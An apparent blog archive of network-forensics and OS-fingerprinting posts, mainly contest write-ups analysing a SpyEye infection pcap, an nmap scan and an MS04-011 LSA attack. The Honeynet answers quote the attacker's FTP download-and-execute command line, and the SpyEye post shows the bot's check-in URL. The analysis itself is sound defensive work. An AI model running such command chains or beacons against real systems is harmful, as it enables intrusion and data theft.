- UPX - http://upx.sourceforge.net/
- NO AV software installed

Download and install all software, disconnect network, just in case.

Once Sandboxie is installed some quick initial tweaks for todays fun:
- Sandbox Settings > Recovery > Immediate Recovery > Uncheck 'Enable Immediate Recovery' May want to look at (I haven't played with these settings before):
Restrictions > Drop Rights > 'Drop rights from Administrators and Power Users group'

After installing all of the software above in my VM I snapshotted it so that I could role back to a known safe/uninfected machine as needed.

On to looking at the infected.pcap file:
First thing to do is launch NetworkMiner from within a Sandbox. Right click on the NetworkMiner.exe and say 'Run Sandboxed' (again we've already installed all software)

Lets first look at the different conversations/systems involved. We have 2 systems on the local network.
192.168.23.2 - appears to be the default gateway or proxy server for the network
192.168.23.129 - Windows XP ssystem with .Net 2.0, 3.0, 3.5 and Java 1.6.0.0_05 installed on it. And on a workgroup/domain called TICKLAB (need to check Satori and see why I didn't see this there?)

192.168.23.129 has 4 outgoing sessions:
59.53.91.102:80 [nrtjo.eu] - 6 sessions, downloading 7 files
65.55.195.250:443 - 1 session
212.252.32.20:80 [freeways.in] - 1 session, downloading 1 file
213.155.29.144:444 - 1 session

We can now safely look at the files that were extracted by NetworkMiner. Files Tab > Right click on first file > Open Folder. When you do this action from within a sandboxie env it will open up the file explorer also in that same sandboxed env. You can see this with the [#] Title [#] scenario in the title bar. While you can still infect yourself by running an infected exe this way, it will be, in theory at least, contained by the sandbox and go away when you close out and delete the sandbox.

The 7 files that were downloaded from 59.53.91.102 were: (filename as NetworkMiner saved it, may not be the name it was on the server)
true.php.html
xxx.xxx.txt
favicon.ico.html
sdfg.jar.x-java-archive
q.jar.x-java-archive
file.exe.octet-stream
file.exe[1].octet-stream

For proper analysis of what it is actually doing true.php should be run through a process to convert it to 100% readable text. It does a few different things trying to obscure what it is doing, I assume so as to try to evade different tests that a system may do to determine if it is malicious. 2 things you can see are the two jar files it does with document.write, sdfg.jar and q.jar. xxx.xxx will also need looked at because it calls .replace on the text in true.php (I think, need to dig more)

Anyway, we have an answer to #1 and #3 now, the two .jar files that got created and what file did it.

Conversation to 212.252.32.20 reveals a bit of interesting info. It requests the following:
/11111/gate.php?guid=ADMINISTRATOR!TICKLABS-LZ!1C7AE7C1&ver=10084&stat=ONLINE&ie=8.0.6001.18702&os=5.1.2600&ut=Admin&cpu=92&ccrc=5A4F4DF7&md5=5942ba36cf732097479c51986eee91ed

broken down we have:
guid=ADMINISTRATOR!TICKLABS-LZ!1C7AE7C1
Logged on user id, computer name, ? hash maybe ?

So now we have answer #2.

...

ie=8.0.6001.18702
version of IE on the infected system

os=5.1.2600
System OS which we already determined by passive means before, but good to see we have the same info here.

...

md5=5942ba36cf732097479c51986eee91ed
This is the MD5 of the packed file. Possibly a phone home feature to let it know what version is out there on each

system if ver above isn't that?

We can verify this is the MD5 on the file by right clicking on the file.exe.octet-stream and going to properties and then the File Hashes tab (this is what HashTab does)

Now we have answer #4.

Based on the MD5 and some of the other info it is doing, this appears to be a decent writeup on it:
http://www.threatexpert.com/report.aspx?md5=0f37839f48f7fc77e6d50e14657fb96e
http://autovin.pandasecurity.my/?p=4780
http://www.virustotal.com/analisis/9459b0d6f7cdec6860c458944386896f78cb60befdd04fbeab0df5b6661a3f81-1268644492
http://anubis.iseclab.org/?action=result&task_id=1c8c1f787d845a7941d93e37adce1be8b&format=txt

Ok, so now we need to determine how/if our .exe is packed.
Right click on exeinfope.exe and tell it to run sandboxed (needed, probably not, but...). Go to the directory where the file.exe.octet-stream file resides and open it.

Exeinfo PE ver 0.0.2.7 says it is:
UPX -> Markus & Laszlo ver. [ 3.04 ] <- info from file. ( sign like UPX packer )

Same idea, but with PEiD v0.95 (may be a newer version?)
UPX 0.89.6 - 1.02 / 1.05 - 2.90 -> Markus & Laszlo

So we now have answer #5

To get answer #6 we'll need to get UPX and run "upx -d" on the file and then compute the MD5 with HashTab again.

So just to be same, run a cmd.exe inside the sandbox also, go do the directory where the file is:
upx -d file.exe.octet-stream

This will expand the file out. Now go back to explorer, properties on file.exe.octet-stream, File Hashes and then new

MD5 is: 0F37839F48F7FC77E6D50E14657FB96E

Answer #6

For the last part, to know where it tries to go there are a few ways to look at this. We know it has to be one of the systems that our infected host tried to contact, we can look at the traffic there and try to determine it, we can dig around in the unpacked .exe and try to find the code (beyond my level) or we can purposely infect our VM and see what happens.

Based on other info we found on the MD5 we actually know from other peoples writeups where it was going and can verify that we also tried to go there in the packet capture. 213.155.29.144 port 444.

This malware appears to be SpyEye, a good writeup on it can be found here, which details some of what I had already figured out from the URL info:
http://blog.novirusthanks.org/2010/01/a-new-sophisticated-bot-named-spyeye-is-on-the-market/

Twitter and clear text passwords when changing settings

2010-05-12T08:05:00.002-06:00

There are a few links around and I actually Tweeted about this last week, but figured I'd put it here since it is a bit more permanent.

If you change any settings in Twitter it pushes that password in the clear text. Initial login is secure, but changes to settings afterward reprompt for password, and this one is sent in the clear. Something to be aware of! (Also sounds like password changes once logged on may be sent in the clear also, I didn't verify this one)

I found out about it from the NetworkMiner list and verified the issue myself. I sent something onto twitter through their help page, but haven't heard anything on it nor do I know if they've updated it, but here was the original thread and another video demo:

http://www.hak5.org/forums/index.php?s=2e2403f573f4726eb99f84edad76c867&showtopic=16497
http://www.youtube.com/watch?v=177qSf1VcWg&feature=player_embedded#!

Fingerprint Editor updated

2010-05-10T13:03:00.002-06:00

There have been a few updates to this and other products on his page that I haven't mentioned. Anyway, thanks for the recent updates/fixes. If you are utilizing any of the .xml files I provide I highly recommend using this to edit them!

Also, I've updated 3 or 4 of the main .xml files multiple times in the past week after not having updated them in quite some time. So make sure you check for new updates of the .xml files. There may be some new ones that haven't made it into the latest Fingerprint Editor program.

Contest #5

2010-04-10T21:21:00.002-06:00

This one has nothing to do with os fingerprinting, passive or active, it is malware based. Being that that is the case I almost didn't post anything here about it, but I know I have some people following the blog in a "hidden" manner, so for those that are and are interested, there is a malware forensic challenge out there for you!

The puzzle:

It was a morning ritual. Ms. Moneymany sipped her coffee as she quickly went through the email that arrived during the night. One of the messages caught her eye, because it was clearly spam that somehow got past the email filter. The message extolled the virtues of buying medicine on the web and contained a link to the on-line pharmacy. “Do people really fall for this stuff?” Ms. Moneymany thought. She was curious to know how the website would convince its visitors to make the purchase, so she clicked on the link.

The website was slow to load, and seemed to be broken. There was no content on the page. Disappointed, Ms. Moneymany closed the browser’s window and continued with her day.

She didn’t realize that her Windows XP computer just got infected.

You are the forensic investigator. You possess the network capture (PCAP) file that recorded Ms. Moneymany’s interactions with the website. Your mission is to understand what probably happened to Ms. Moneymany’s system after she clicked the link. Your analysis will start with the PCAP file and will reveal a malicious executable.

Answer the following questions:

1. As part of the infection process, Ms. Moneymany’s browser downloaded two Java applets. What were the names of the two .jar files that implemented these applets?
2. What was Ms. Moneymany’s username on the infected Windows system?
3. What was the starting URL of this incident? In other words, on which URL did Ms. Moneymany probably click?
4. As part of the infection, a malicious Windows executable file was downloaded onto Ms. Moneymany’s system. What was the file’s MD5 hash? Hint: It ends on “91ed”.
5. What is the name of the packer used to protect the malicious Windows executable? Hint: This is one of the most popular freely-available packers seen in “mainstream” malware.
6. What is the MD5 hash of the unpacked version of the malicious Windows executable file?
7. The malicious executable attempts to connect to an Internet host using an IP address which is hard-coded into it (there was no DNS lookup). What is the IP address of that Internet host?

Prize: Lenovo Ideapad S10-2 netbook

----

I've taken a look at it and may have to try to spend some time working on it. If nothing else just as a new puzzle to figure out. I won't be writing any code for it, but may use it as a chance to understand java more and how this malware got on the machine and ran.

Forensics contest #4 Results

2010-04-02T09:22:00.002-06:00

Made the finalist list!

They've released contest #5, I'll post more on it later today or this weekend.

Forensics contest #4 Answer

2010-03-19T09:39:00.003-06:00

Ok, 3/18/10 has come and gone so I figure it is ok to post my answer at this point in time. Not sure if I got it correct or not, but here goes. I actually made some changes to Satori and wrote a new .exe specifically for parsing the data you can find more in the writeup:

Answer 1: 10.42.42.253
Answer 2: TCP CONNECT
Answer 3a: 10.42.42.50
Answer 3b: 10.42.42.56
Answer 3c: 10.42.42.25
Answer 4: 00:16:CB:92:6E:DC
Answer 5: 10.42.42.50
Answer 6: 135
Answer 6: 139

Xtra-Credit:
NMAP, we can tell this by some of the unique things it does on Syn Scans, also some of the MSS sizes it sends in its OS fingerprinting tests and its ICMP code of 9 in that test.

While not exactly like NMAP puts out and without the OS guesses:

---------------------------------------
Summary
---------------------------------------
List of Possible NMAP Scanning machines (and number of ports scanned):
10.42.42.25=12
10.42.42.253=7420

List of Possible Machines Scanned by NMAP System (and number of ports scanned):
10.42.42.25=3401
10.42.42.50=2025
10.42.42.56=2005

Systems with Open Ports:
10.42.42.50 - 135/tcp
10.42.42.50 - 139/tcp

Systems with Unfiltered Ports:
10.42.42.25 - 1/tcp
10.42.42.253 - 36020/tcp
10.42.42.253 - 36119/tcp
10.42.42.253 - 36120/tcp
10.42.42.253 - 36121/tcp
10.42.42.253 - 36122/tcp
10.42.42.253 - 36123/tcp
10.42.42.253 - 36124/tcp
10.42.42.253 - 36131/tcp
10.42.42.253 - 36134/tcp
10.42.42.50 - 1/tcp
10.42.42.50 - 135/tcp
10.42.42.56 - 1/tcp

Systems with Closed Ports:
10.42.42.25=2003 Port(s) not Shown
10.42.42.253=2 Port(s) not Shown
10.42.42.50=2000 Port(s) not Shown
10.42.42.56=2005 Port(s) not Shown

Description:
Running the packet capture through nfc (http://myweb.cableone.net/xnih/download/nfc.zip), we find out there 2 possible systems doing some type of scan:

10.42.42.25 and 10.42.42.253, looking at the sheer number of scan packets, we can tell that 10.42.42.253 is the main system doing any type of scan. We can also look at SYN, Connect, XMAS and NULL scan types and see that 10.42.42.253 shows up in all 4, where 10.42.42.25 only shows up in the Connect Scan.

While 10.42.42.253 does do SYN, Connect, XMAS, NULL, and at least 1 port on UDP (probably during the OS fingerprinting part when looking for a closed UDP port). The first scan he does though is a TCP Connect Scan. We can see this by the flags and more importantly by the tcpoptions that are used. The general way we can break down the scan types is as follows (chunk of the delphi code used, due to having to have to port all the c code over to pascal on my own, source is not available, but general info on what was done is provided in the nfc downloaded zip file):

if tcpflags = 'SA' then
OpenPorts.Add(sl.Strings[x])
else if tcpflags = 'RA' then
ClosedPorts.Add(sl.Strings[x])
else if tcpflags = 'R' then
UnfilteredPorts.Add(sl.Strings[x])
else if (tcpflags = 'A') and (tcpoptions = '') then
ACKScan.Add(sl.Strings[x])
else if tcpflags = '' then
NullScan.Add(sl.Strings[x])
else if tcpflags = 'FPU' then
XMASScan.Add(sl.Strings[x])
else if tcpflags = 'S' then
begin
if tcpoptions = 'M1460:.' then
SynScan.Add(sl.Strings[x])
else //tcpoptions are going to be OS specific, so doing catch all for now
ConnectScan.Add(sl.Strings[x]);
end;

The tcpoptions are the same data I use in Satori for passively identifying OS's. This is close to what p0f is doing and the general fingerprints are the same, though mine have been updated over the past few years.

Looking through the summary info of NFC we can see that 3 machines were scanned:
10.42.42.25
10.42.42.50
10.42.42.56

Each saw a different number of ports scanned, this could be due to how NMAP's scripting engine works when it tries to OS fingerprint the remote system, though some of it could also be because of some of the interaction between these 3 hosts between each other when they started up their own conversations.

For OS identification we now look at Satori (http://myweb.cableone.net/xnih/download/satori.zip).

For this exercise some tweaks were made to a few of the fingerprinting dlls. While Satori wasn't designed to specifically parse nmap traffic, it can, though it is a bit slow due to the number of packets with tcpoptions.

One of the dlls that was changed was the icmp one. Found under the pull down for "icmp". NMAP sends ICMP Type 8 packets with an ICMP Code of 9 (Languard sends with a 13, others may send with their own too, trying to elicit a different response with a valid and invalid code). For the TCP dll I modified it to identify more than just S and SA packets (where the original dll just drop all the others), we now process them and tag them, even ones that may be of no use with flags such as FA and PA. The main new useful ones were NULL and XMAS. I also updated the mtu text file under fingerprinting to add in the common MTU sizes that NMAP uses (305, 680, 1440). All of this can be found in the pull down for "tcp".

Note: The downloadable version of Satori is quite old, but the updater program should be run after initial download, selecting ALL files, not just ones it marks as new since it looks at the last modified date, which typically is when you unextracted the file.

Anyway, to determine each OS here we can look at the data that Satori provided:
10.42.42.253 - Linux 2.6 (p0f) or Solaris (ettercap) nothing in my DB to identify it
10.42.42.50 - Windows XP SP3 most likely, XP or 2000 (Satori), Windows 2000 (p0f), BSD or 2000 Server (ettercap)
10.42.42.56 - unknown across all passive fingerprinting
10.42.42.25 - unknown across all passive fingerprinting, but based on MAC and that alone Apple (could always be spoofed) if it is an OS X box, there is a Syn fingerprint that can be added to my DB.

Based on the MAC, the Apple machine's MAC is: 00:16:CB:92:6E:DC

Windows machines IP can be seen above.

Using either NFC or Satori we can see that TCP ports 135 and 139 were open on it.

NFC output:
---------------------------------------
Types of Scans and General Info
---------------------------------------
SYN Scan info:
Start Time: 2010-02-02 17:43:10 Packet #: 6728
End Time: 2010-02-02 17:44:03 Packet #: 13525
System(s) appearing to do SYN Scans:
10.42.42.253=3745
System(s) appearing to be SYN Scanned:
10.42.42.25=1745
10.42.42.56=1000
10.42.42.50=1000

Connect Scan info:
Start Time: 2010-02-02 17:34:06 Packet #: 1
End Time: 2010-02-02 17:44:12 Packet #: 13620
System(s) appearing to do Connect Scans:
10.42.42.253=3670
10.42.42.25=12
System(s) appearing to be Connect Scanned:
10.42.42.50=1024
10.42.42.56=1003
10.42.42.25=1655

XMAS Scan info:
Start Time: 2010-02-02 17:44:10 Packet #: 13599
End Time: 2010-02-02 17:44:13 Packet #: 13624
System(s) appearing to do XMAS Scans:
10.42.42.253=4
System(s) appearing to be XMAS Scanned:
10.42.42.56=2
10.42.42.25=1
10.42.42.50=1

NULL Scan info:
Start Time: 2010-02-02 17:44:10 Packet #: 13597
End Time: 2010-02-02 17:44:10 Packet #: 13597
System(s) appearing to do NULL Scans:
10.42.42.253=1
System(s) appearing to be NULL Scanned:
10.42.42.50=1

---------------------------------------
Summary
---------------------------------------
List of Possible NMAP Scanning machines (and number of ports scanned):
10.42.42.25=12
10.42.42.253=7420

List of Possible Machines Scanned by NMAP System (and number of ports scanned):
10.42.42.25=3401
10.42.42.50=2025
10.42.42.56=2005

Systems with Open Ports:
10.42.42.50 - 135/tcp
10.42.42.50 - 139/tcp

Systems with Unfiltered Ports:
10.42.42.25 - 1/tcp
10.42.42.253 - 36020/tcp
10.42.42.253 - 36119/tcp
10.42.42.253 - 36120/tcp
10.42.42.253 - 36121/tcp
10.42.42.253 - 36122/tcp
10.42.42.253 - 36123/tcp
10.42.42.253 - 36124/tcp
10.42.42.253 - 36131/tcp
10.42.42.253 - 36134/tcp
10.42.42.50 - 1/tcp
10.42.42.50 - 135/tcp
10.42.42.56 - 1/tcp

Systems with Closed Ports:
10.42.42.25=2003 Port(s) not Shown
10.42.42.253=2 Port(s) not Shown
10.42.42.50=2000 Port(s) not Shown
10.42.42.56=2005 Port(s) not Shown

No Results are perfect here since we are not taking into account where in the scan certain things

happen.

This is just a quick and dirty best guess based on what we are seeing.

---

Satori being a GUI program will have to be downloaded and run.

Web fingerprinting

2010-03-07T15:27:00.002-07:00

There was a thread started awhile back (on full disclosure) and I just figured I'd summarize the apps that they put out there for fingerprinting web sites:

http://sucuri.net/?page=docs&title=fingerprinting-web-apps

There is also a live tool for you to test with any site:
http://sucuri.net/?page=docs&title=fingerprinting-web-apps#v6

--

http://www.morningstarsecurity.com/research/whatweb

--

http://www.mytty.org/wafp/

--

I haven't checked any of them out, but wanted to add them here so I could find them if/when I'm looking in the future! If you have any others feel free to add them in a reply to this post.

Pass the Hash

2010-02-25T10:25:00.002-07:00

While I normally post info on here about fingerprinting, I also like looking at anything that "gives away too much info". I've known about the pass the hash technique for quite awhile now, never paid it much attention until I watch a demo on how effective it can be.

Anyway, nice paper on how it works, some of the tools to do it and some mitigation options from what I've read so far. Need to do more than scan it, but give it a check.

SSL/TLS Fingerprinting

2010-02-17T22:44:00.002-07:00

I've been following Thierry Zoller off and on for years now, probably helped that he was one of the first people to find and mention Satori back in the day.

He's come up with a new tool that fingerprints SSL/TLS connections called SSL/TLS Audit. Actually, it is a tool that does SSL/TLS Auditing, just happens to have a feature that in turn fingerprints the ssl engine.

"Apart from scanning available ciphersuites it has an interesting tidbit : The Fingerprint mode (Experimental). Included is an experimental fingerprint engine that tries to determine the SSL Engine used server side. It does so by sending normal and malformed SSL packets that can be interpreted in different ways.

SSL Audit is able to fingerprint :
· IIS7.5 (Schannel)
· IIS7.0 (Schannel)
· IIS 6.0 (Schannel)
· Apache (Openssl)
· Apache (NSS)
· Certicom
· RSA BSAFE "

They have an upcoming paper due out it looks like, so it will be interesting to see what information they provide. Gives me some ideas, so depending on time in the near future I may have to look into this a bit more.

Honeynet Challenge #1 Results

2010-02-14T16:22:00.002-07:00

Well I didn't do as well as I'd hoped on Challenge #1, only got a 25 out of 40 on score, ranking me 28 out of the 91 submissions. Top third, but not as high as I would have liked.

Here were my score results:
Answer 1: 2 points (of 2)
Answer 2: 1.5 points (of 2)
Answer 3: 2 points (of 2)
Answer 4: 1.5 points (of 2)
Answer 5: 4 points (of 6)
Answer 6: 3 points (of 6)
Answer 7: 2 points (of 2)
Answer 8: 1 points (of 8)
Answer 9: 4 points (of 6)
Answer 10: 2 points (of 2)
Answer 11: 2 points (of 2)

Looks like I blew the shell code section along with the general overview! A bit off here/there other than that too, but those were the worst sections.

Here were the questions again:
1. Which systems (i.e. IP addresses) are involved? (2pts)
2. What can you find out about the attacking host (e.g., where is it located)? (2pts)
3. How many TCP sessions are contained in the dump file? (2pts)
4. How long did it take to perform the attack? (2pts)
5. Which operating system was targeted by the attack? And which service? Which vulnerability? (6pts)
6. Can you sketch an overview of the general actions performed by the attacker? (6pts)
7. What specific vulnerability was attacked? (2pts)
8. What actions does the shellcode perform? Pls list the shellcode. (8pts)
9. Do you think a Honeypot was used to pose as a vulnerable victim? Why? (6pts)
10. Was there malware involved? Whats the name of the malware? (We are not looking for a detailed malware analysis for this challenge) (2pts)
11. Do you think this is a manual or an automated attack? Why? (2pts)

Anyway, very fun exercise, glad they put it on and they are posting the results earlier than I thought they would, didn't expect anything until tomorrow.

Looks like they are planning another one in the near future. Not sure it is something I'll work on, but keep your eyes on their site if you are interested!

Forensic Contest #4 released

2010-02-04T10:20:00.002-07:00

More information at their site, but here is what they are asking you to find.

1. What was the IP address of Mr. X’s scanner?
2. What type of port scan(s) did Mr. X conduct? Check all that apply:

* TCP SYN
* TCP ACK
* UDP
* TCP Connect
* TCP XMAS
* TCP RST

3. What were the IP addresses of the targets Mr. X discovered?
4. What was the MAC address of the Apple system he found?
5. What was the IP address of the Windows system he found?
6. What TCP ports were open on the Windows system? (Please list the decimal numbers from lowest to highest.)
X-TRA CREDIT (You don’t have to answer this, but you get super bonus points if you do): What was the name of the tool Mr. X used to port scan? How can you tell? Can you reconstruct the output from the tool, roughly the way Mr. X would have seen it?

Deadline is 3/04/10 (11:59:59PM UTC-11) (In other words, if it’s still 3/04/10 anywhere in the world, you can submit your entry.)

Forensics Contest #3 - Answers

2010-02-02T11:21:00.002-07:00

Ok, not going to do a writeup on this one. NetworkMiner was able to pull all the info out without much work. Thankfully it puts tcp packets back together and reconstructs the .xml files in question. Hopefully someone out there was able to come up with a new script to pull all the info they wanted, but it wasn't me, that is for sure!

My answers were:
1. 002500FE07C4
2. AppleTV/2.4
3. h, ha, hac, hack
4. Hackers
5. http://a227.v.phobos.apple.com/us/r1000/008/Video/62/bd/1b/mzm.plqacyqb..640x278.h264lc.d2.p.m4v
6. Sneakers
7. $9.99
8. iknowyourewatchingme

Honeynet Challenge #1 - Answers

2010-02-02T11:15:00.003-07:00

The deadline was yesterday, so I think I'm ok posting my answers. Not sure if these are correct or not, but this is what I submitted. If anyone has any questions let me know. Again, this was a fun exercise:

Question 1. Which systems (i.e. IP addresses) are involved?

Tools Used: Satori, NetworkMiner, and Wireshark
192.150.11.111 – End system
98.114.205.102 - Attacker

-----

Question 2. What can you find out about the attacking host (e.g., where is it located)?

Tools Used: WHOIS, Wireshark

TTL – 113, since appears to be a windows box, 15 hops away.

According to: http://www.ipaddresslocation.org/ip-address-locator.php

They are most likely located in/around Southampton Pennsylvania, which is where the local Verizon Internet Services office is located at least.

Attack System appears to be a Windows 2000 system (TTL puts it as Windows (typically) and TCP fingerprint put it as a Windows 2000, XP or 2003 box and SMB puts it as Windows 2000 and SMB is the most reliable of those mentioned normally).

-----

Question 3. How many TCP sessions are contained in the dump file?

Tools Used: NetworkMiner, verified with Wireshark

5 total:
- 4 from 98.114.205.102
- 1 from 192.150.11.111

-----

Question 4. How long did it take to perform the attack?

Tools Used: wireshark Awarded Points:

It depends on what part you consider the actual attack:

Max of 16.2 seconds from the first packet to the last packet in the capture. Most of the time is actually FTP’ing a file.

Within the first 2 seconds the Buffer Overflow has already taken place. The next 14 seconds are sending the command to the system and FTP’ing the file.

-----

Question 5. Which operating system was targeted by the attack? And which service? Which vulnerability?

Tools Used: Satori, wireshark

192.150.11.111

2 competing fingerprints:

* Based on TTL and TCP fingerprinting it appears to be a Linux box, most likely 2.6 kernel.
* SMB packets on the otherhand claim it is on the VIDCAM Domain and running Windows 5.1 (packet 16 & 19)

Based on the attack that appears to be happening against DsRoleUpgradeDownlevelServer I’d say it is an XP system; Trying to exploit MS04-011, targeting the Windows LSA Service.

-----

Question 6. Can you sketch an overview of the general actions performed by the attacker?

Tools Used: wireshark

Authenticates as a null user to ipc$, peforms a DsRoleUpgradeDownlevelServer Buffer Overflow. Once exploited forces the system to FTP a file.

First they dump these commands in the file ‘o’:

open 0.0.0.0 8884

user 1 1

get ssms.exe

Then they do:

ftp –n –s:o (Suppresses auto-login and reads data in from the ‘o’ file)

Delete the ‘o’ file to make sure nobody can see what they did, forcing it quite mode and deleting of read only files, just in case.

Then launch ssms.exe

-----

Question 7. What specific vulnerability was attacked?

MS04-011, good writeup at:

http://research.eeye.com/html/advisories/published/AD20040413C.html

-----

Question 8. What actions does the shellcode perform? Pls list the shellcode

Tools Used: wireshark, trace tcp conversation

It targets DSRoleUpgradeDownLevelServer, does a buffer overflow of a lot of 0x31, or 1’s in ascii. As soon as that is done it starts a new TCP conversation and does this (more info back in question #6)

echo open 0.0.0.0 8884 > o&echo user 1 1 >> o &echo get ssms.exe >> o &echo quit >> o &ftp -n -s:o &del /F /Q o &ssms.exe

ssms.exe

It appears to call ssms.exe twice, not sure if that is by design or due to a bug???

-----

Question 9. Do you think a Honeypot was used to pose as a vulnerable victim? Why?

Tools Used: Satori (http://myweb.cableone.net/xnih)

Yes. Go back to #5. TCP fingerprint shows the box as Linux 2.6, SMB shows the box as Windows XP. The TTL can be tweaked on windows, but the rest of the TCP fingerprint is hard to modify, though there are some tweaks that can be done that may allow this.

-----

Question 10. Was there malware involved? Whats the name of the malware? (We are not looking for a detailed malware analysis for this challenge)

Smss.exe, may be W32/Spybot-MP worm and IRC backdoor, but without analysis it is hard to say. That is just a guess based on the name and the name alone.

-----

Question 11. Do you think this is a manual or an automated attack? Why?

Automated, it only took 16 seconds from start to finish. Typing this sentence up took that long with a few typo’s! Not to mention, most of that 16.2 seconds was downloading the ssms.exe file. So while it is possible someone sat there and did it, due to the quickness in which it took place it seems unlikely.

Honeynet - Challenge 1 of the Forensic Challenge 2010

2010-01-25T10:12:00.004-07:00

Ok, I posted this a week or so ago to the NetworkMiner beta list, but forgot to put anything up on here about it. This was a fun exercise, different than the other ones I've done and posted about recently.

It was short notice when I put it on that list, even shorter here, but...

In this case, no need to write code, just find the answers and tell them what program(s) you used.

----

The Challenge:
A network trace with attack data is provided. (Note that the IP address of the victim has been changed to hide the true location.) Analyze and answer the following questions:

1. Which systems (i.e. IP addresses) are involved? (2pts)
2. What can you find out about the attacking host (e.g., where is it located)? (2pts)
3. How many TCP sessions are contained in the dump file? (2pts)
4. How long did it take to perform the attack? (2pts)
5. Which operating system was targeted by the attack? And which service? Which vulnerability? (6pts)
6. Can you sketch an overview of the general actions performed by the attacker? (6pts)
7. What specific vulnerability was attacked? (2pts)
8. What actions does the shellcode perform? Pls list the shellcode. (8pts)
9. Do you think a Honeypot was used to pose as a vulnerable victim? Why? (6pts)
10. Was there malware involved? Whats the name of the malware? (We are not looking for a detailed malware analysis for this challenge) (2pts)
11. Do you think this is a manual or an automated attack? Why? (2pts)

Infected sites and Google Alerts

2010-01-24T22:02:00.003-07:00

Not as much on OS fingerprinting, but due to alerts I have setup from google alerts on fingerprinting I've been getting a look at a couple hundred sites that have been taken over in some form or another since just before Christmas. I'm getting google to notify me of compromised sites and I don't want it anymore, I want to go back to useful alerts for new info on fingerprinting out there!

Sites end up being:
http://somewhere.wherever/5-6 character junk/

The first 2 I saw I actually dropped notes to those compromised and was happy to see them clean them up, patched I have no idea, but cleaned up.

Everything was Apache from what I could tell doing Banner Grabbing with Satori. It wasn't something I was too worried about, but .....

Could be an apache hole, openssl, php, etc. Hard to say.

Looking at one that has been compromised since Christmas the following layout is there:
1g
1r.txt
1t
2.js
2r.txt
academia.php
accenture.php
....
fingeprinting.php
...
passive.php

1g -
file seems to list a ton of other sites, possibly ones compromised or possibly ones to dump you off to. I played around a bit with it back at Christmas, assumed the problem would go away and forgot about it for the most part. But since it is a month later and I'm still getting new ones each day I figured I'd at least post something on it.

1t -
possibly usernames it is trying

2r -
php files it is going to create

Simple search to find pages with google to get an idea:
"fingerprinting the dead with rigor morits"

Based on file times I assume there is some type of automated scan they are doing and dumping their first .php file on it. Then someone is going through those lists 12-24 hours later and uploading the rest. Just looking at timestamps on the files there is typically one file created on day 0, then all the others get created the next day, but not all at the same time, one here, one there.

Anyway, if anyone is going to go poking around, make sure you just the subdir (directory listing is turned on in all the ones I looked at), such as:
http://xxxxxxxx.com/z1jyed/fingerprinting.php
only go to:
http://xxxxxxxx.com/z1jyed/

Oh yeah, I was going to go poke around on some of my Apache boxes and make sure they weren't compromised. Maybe tomorrow.

Passive Fingerprinting of Network Reconnaissance Tools

2010-01-04T16:06:00.002-07:00

Last month I ran across the initial 3 page IEEE summary of this thesis paper. At the time I wasn't able to find a full copy of it. Though now it looks like there is a copy out there dtic.mil

In a nutshell they look at the visual fingerprint a scanner, such as NMAP, UnicornScan, etc makes as it scans a system. By utilizing the information they obtain they can tell what program is scanning your system.

Anyway, interesting twist, fingerprinting the application scanning you. I had looked at doing this with some products, but never to this extent, very nicely done!

Forensics Contest #3 released

2009-12-28T09:12:00.002-07:00

For the holidays they released challenge #3. This time you'll need to reassemble packets to get the whole picture! May be beyond what I can throw together in perl, actually 99% sure it is since I tried to do this a little last time. I'll probably write something in C or Pascal for it. Problem with doing it in pascal is they are going to want the source and I'm not sure i'm willing to give up my source on winpcap stuff. We'll see, maybe use something else to rip the traffic out and then just put a nice gui front end on it with pascal. Who knows.

Anyway, check it out.

Forensics Contest #2 Finalists and Winners

2009-12-17T22:10:00.005-07:00

Based on the PaulDotCom 180 podcast Franck and Jeremy were the winners, they decided to have co-winners this time around. Erik and NetworkMiner ended up being finalists again and got special mention in the podcast.

As of this posting they haven't actually published this at the forensicscontest site, but I guessed at the URL and picked up the Finalists along with the winners from the podcast.

Will be fun to look through the winners submissions over the next few days/weeks. Contest #3 is hopefully due out in the next 7-14 days.

Update:
Posted:
Contest Winners and writeup now posted

I made the SemiFinalist list (top 15), just didn't make the finalist list (top 8). Maybe Contest #3!

DFRWS results posted

2009-12-13T20:40:00.003-07:00

At the time the 2009 challenge was posted I think I only looked at the network traffic side of things and didn't get a lot out of it. Not sure if I'd done the GCFA and SANS 508 course at that time or not, but I know I didn't dig into the memory or disk dumps. Would have been nice to knowing a bit more about that stuff now. Anyway, glanced through a few of the writeups, very nice work!

You can find the writeups, challenge info, etc here

I think NetworkMiner will make much better use of the pcap files that Satori does, but Satori isn't designed for this type of thing anyway!

Network Forensic Challenge #2 - update

2009-11-23T14:06:00.005-07:00

Ok, the submission date got extended an extra week, which ended yesterday. Erik put out version 0.90 of NetworkMiner in which he added support to pull out SMTP messages from captured data. He found a bug in 0.90 and released 0.91 yesterday, it can be found here.

My answers are here:
1. Username:sneakyg33k@aol.com
2. Password:558r00lz
3. mistersecretx@aol.com
4. fake passport and a bathing suit.
5. secretrendezvous.docx
6. 9E423E11DB88F01BBFF81172839E1923
7. Playa del Carmen, Mexico
8. AADEACE50997B1BA24B09AC2EF1940B7

I used the pcapcat perl script from NFC #1 to extract the initial data. The one thing I think is a bit unrealistic in these contests is the packet captures are too small, there isn't 100-500 MB of stuff to sift through, trying to decide what is needed/not. Due to download feeds and whatnot I understand why that is, but.... Feeding a 100 kb pcap file through makes life quite simple. Anyway, I emailed the author of pcapcat, for what we've seen in #1 and #2 that script works fine, but if any packets are resent, or out of order, pcapcat fails to take that into account and just puts the data in the output file in the order it was seen in the pcap file. I tried to make some changes to it to fix that, but it was beyond what i could figure out in a short enough time period. Sent my thoughts on to him and we'll see if it gets updated in a future release. We could have used tcpflow, wireshark, etc to get the initial conversation dumped out.

Anyway, however you get the raw data is up to you, dump to it a file and then for me, feed it through smtpcat.pl which will parse it into whatever attachments it may have, pull the username/password out and decode them. You'll still need to do an MD5Sum on the extracted file. My script was completely hacked together, no subs, just start to finish run and output. Not pretty, but functional!

Open up the extracted file and you'll see the location they are meeting at and because .docx files are just zipped up files you can do an unzip on the .docx file, browse around, find the image file and do an MD5Sum on it also.

I'm being a bit vague on this one because it has been well over a month since I did most of this, and I don't recall all the specifics anymore. Here is someone else's writeup on how they did it, goes into a bit more detail, but same idea. His smtpcat is of course different than mine.

Update: (ok had some time to run through this for those who may need some more info)

First lets see what conversations we have going on in evidence02.pcap:
C:\nft>perl pcapcat.pl -r evidence02.pcap
[1] TCP 192.168.1.159:1036 -> 64.12.102.142:587
[2] TCP 192.168.1.159:1038 -> 64.12.102.142:587

Lets dump each:
C:\nft>perl pcapcat.pl -r evidence02.pcap -w file1.txt -d 1
C:\nft>perl pcapcat.pl -r evidence02.pcap -w file2.txt -d 2

